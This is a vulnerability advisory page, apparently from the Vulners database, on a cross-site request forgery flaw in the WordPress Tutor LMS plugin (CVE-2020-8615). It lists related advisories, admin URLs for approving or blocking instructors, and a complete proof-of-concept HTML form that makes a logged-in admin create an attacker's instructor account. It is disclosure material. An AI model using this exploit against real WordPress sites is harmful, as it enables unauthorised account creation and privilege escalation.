Tutor LMS < 1.5.3 - Cross-Site Request Forgery (CSRF)
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Wordpress Tutor LMS 1.5.3 Plugin - Cross-Site Request Forgery (Add User) Vulnerability | 2 Mar 202000:00 | – | zdt | |
| CVE-2020-8615 | 4 Feb 202020:15 | – | attackerkb | |
| WordPress Tutor LMS Cross-Site Request Forgery Vulnerability | 11 Feb 202000:00 | – | cnvd | |
| WordPress Tutor LMS Plugin Cross Site Request Forgery (CVE-2020-8615) | 26 Mar 202000:00 | – | checkpoint_advisories | |
| CVE-2020-8615 | 4 Feb 202019:01 | – | cve | |
| CVE-2020-8615 | 4 Feb 202019:01 | – | cvelist | |
| WordPress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User) | 2 Mar 202000:00 | – | exploitdb | |
| EUVD-2020-29463 | 7 Oct 202500:30 | – | euvd | |
| Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User) | 2 Mar 202000:00 | – | exploitpack | |
| Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery | 30 Aug 202605:46 | – | nuclei |
10
As the requests for the approval and blocking of instructors are sent using the GET method, the CSRF attack to approve an attacker-controlled instructor account can be performed by having the admin visit https://example.com/wp-admin/admin.php?page=tutor-instructors&action=approve&instructor=8 directly, after retrieving the instructor ID during the registration process.
An approved instructor can also be blocked by directing the admin to visit https://example/wp-admin/admin.php?page=tutor-instructors&action=blocked&instructor=7.
CSRF attack can also be performed on the form present at https://example/wp-admin/admin.php?page=tutor-instructors&sub_page=add_new_instructor in order to have the admin add an instructor account for the attacker, thus bypassing the requirement for approval. This can be done by tricking the admin to submit the below-given web form as a POST request. For example, if the web form is hosted on an attacker-controlled domain https://attacker.com/csrf.html, an admin who is logged in at https://example can be tricked into visiting the link and triggering the request to add an instructor.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="add_new_instructor" />
<input type="hidden" name="first_name" value="John" />
<input type="hidden" name="last_name" value="Doe" />
<input type="hidden" name="user_login" value="jd_instructor" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="phone_number" value="1231231231" />
<input type="hidden" name="password" value="Pa$$w0rd!" />
<input type="hidden" name="password_confirmation" value="Pa$$w0rd!" />
<input type="hidden" name="tutor_profile_bio" value="Et tempore culpa n" />
<input type="hidden" name="action" value="tutor_add_instructor" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Sep 2020 08:25Current
0.9Low risk
Vulners AI Score0.9
EPSS0.0883